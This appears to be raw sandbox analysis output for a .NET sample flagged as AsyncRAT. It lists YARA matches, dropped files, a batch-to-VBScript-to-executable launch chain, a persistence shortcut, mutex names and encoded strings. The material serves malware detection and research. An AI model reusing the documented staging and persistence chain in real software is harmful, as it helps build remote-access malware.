                      Source: x.exe, Program.csBase64 encoded string: System.Security.
                      Source: x.exe, Program.csBase64 encoded string: System.Net
                      .NET source code contains very large strings
                      Source: x.exe, Program.csLong String: Length: 345234
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_00007FF847021C117_2_00007FF847021C11
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_00007FF847026B027_2_00007FF847026B02
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_00007FF8470210FA7_2_00007FF8470210FA
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_00007FF847025D567_2_00007FF847025D56
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_00007FF8470258597_2_00007FF847025859
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5808 -s 2288
                      Source: x.exe.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: Hoodbyunlock.exe.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: x.exe, 00000000.00000000.2075833267.0000000000D02000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemy men.exe4 vs x.exe
                      Source: x.exe, 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHoodbyunlock.exe8 vs x.exe
                      Source: x.exe, 00000007.00000000.2151451555.0000000000574000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenameHoodbyunlock.exe8 vs x.exe
                      Source: x.exeBinary or memory string: OriginalFilenamemy men.exe4 vs x.exe
                      Source: x.exe.6.drBinary or memory string: OriginalFilenameHoodbyunlock.exe8 vs x.exe
                      Source: x.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 6.3.cscript.exe.2a3f8e09dd0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 6.3.cscript.exe.2a3f8e09dd0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 6.3.cscript.exe.2a3f936cf80.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 7.2.x.exe.128a1a78.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 7.0.x.exe.560000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 6.3.cscript.exe.2a3f8e09dd0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 6.3.cscript.exe.2a3f8e09dd0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000006.00000003.2145895375.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000007.00000000.2151434038.0000000000562000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000006.00000003.2145801874.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000006.00000003.2145771458.000002A3F8DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\ProgramData\Hoodbyunlock.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: x.exe.6.dr, UAKhR7NJbD3KWn0Nd.csCryptographic APIs: 'TransformFinalBlock'
                      Source: x.exe.6.dr, UAKhR7NJbD3KWn0Nd.csCryptographic APIs: 'TransformFinalBlock'
                      Source: x.exe.6.dr, 8oKYND99avZqdoU5T.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, UAKhR7NJbD3KWn0Nd.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, UAKhR7NJbD3KWn0Nd.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, 8oKYND99avZqdoU5T.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, UAKhR7NJbD3KWn0Nd.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, UAKhR7NJbD3KWn0Nd.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, 8oKYND99avZqdoU5T.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, UAKhR7NJbD3KWn0Nd.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, UAKhR7NJbD3KWn0Nd.csCryptographic APIs: 'TransformFinalBlock'
                      Source: x.exe.6.dr, tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.csBase64 encoded string: 'QYkgsc1FDvF0GNesxHOF9Wo20Eg1WaaU9mtMK9olmbel1Nrcb7gd+Z445IC48enX', 'XODUooqo9MmClRQIr10QqLJ45bFnhoJ+krMfcdq+bqxuLoWfd10x6gfppS0Hyh9Y'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.csBase64 encoded string: 'QYkgsc1FDvF0GNesxHOF9Wo20Eg1WaaU9mtMK9olmbel1Nrcb7gd+Z445IC48enX', 'XODUooqo9MmClRQIr10QqLJ45bFnhoJ+krMfcdq+bqxuLoWfd10x6gfppS0Hyh9Y'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.csBase64 encoded string: 'QYkgsc1FDvF0GNesxHOF9Wo20Eg1WaaU9mtMK9olmbel1Nrcb7gd+Z445IC48enX', 'XODUooqo9MmClRQIr10QqLJ45bFnhoJ+krMfcdq+bqxuLoWfd10x6gfppS0Hyh9Y'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.csBase64 encoded string: 'QYkgsc1FDvF0GNesxHOF9Wo20Eg1WaaU9mtMK9olmbel1Nrcb7gd+Z445IC48enX', 'XODUooqo9MmClRQIr10QqLJ45bFnhoJ+krMfcdq+bqxuLoWfd10x6gfppS0Hyh9Y'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.csBase64 encoded string: 'QYkgsc1FDvF0GNesxHOF9Wo20Eg1WaaU9mtMK9olmbel1Nrcb7gd+Z445IC48enX', 'XODUooqo9MmClRQIr10QqLJ45bFnhoJ+krMfcdq+bqxuLoWfd10x6gfppS0Hyh9Y'
                      Source: Hoodbyunlock.exe.7.dr, tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.csBase64 encoded string: 'QYkgsc1FDvF0GNesxHOF9Wo20Eg1WaaU9mtMK9olmbel1Nrcb7gd+Z445IC48enX', 'XODUooqo9MmClRQIr10QqLJ45bFnhoJ+krMfcdq+bqxuLoWfd10x6gfppS0Hyh9Y'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, tH946UNKBTxtVBt0RwuEFWuEY2yzTB2S.csBase64 encoded string: 'QYkgsc1FDvF0GNesxHOF9Wo20Eg1WaaU9mtMK9olmbel1Nrcb7gd+Z445IC48enX', 'XODUooqo9MmClRQIr10QqLJ45bFnhoJ+krMfcdq+bqxuLoWfd10x6gfppS0Hyh9Y'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: Hoodbyunlock.exe.7.dr, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: Hoodbyunlock.exe.7.dr, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: x.exe.6.dr, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: x.exe.6.dr, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@13/12@2/3
                      Source: C:\Users\user\Desktop\x.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x.exe.logJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: \Sessions\1\BaseNamedObjects\Wbm7f9p3u8lDajjg
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4268:120:WilError_03
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5808
                      Source: C:\Users\user\Desktop\x.exeFile created: C:\Users\user\AppData\Local\Temp\4EuTqZFB.batJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
                      Source: x.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: x.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\x.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\x.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: x.exeReversingLabs: Detection: 65%
                      Source: x.exeVirustotal: Detection: 55%
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile read: C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\x.exe "C:\Users\user\Desktop\x.exe"
                      Source: C:\Users\user\Desktop\x.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\x.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /e "'v" "C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exe
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5808 -s 2288
                      Source: C:\Users\user\Desktop\x.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /e "'v" "C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: msxml3.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: msdart.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: Hoodbyunlock.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\ProgramData\Hoodbyunlock.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: x.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: x.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: x.exe, 00000007.00000002.3111404709.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb` source: x.exe, 00000007.00000002.3111404709.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: lib.pdb source: x.exe, 00000007.00000002.3111404709.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Windows.Forms.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Drawing.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: mscorlib.pdbL+ source: x.exe, 00000007.00000002.3113363388.000000001B807000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Configuration.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.Drawing.ni.pdbRSDS source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Xml.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: 0C:\Windows\mscorlib.pdb source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER93E4.tmp.dmp.11.dr
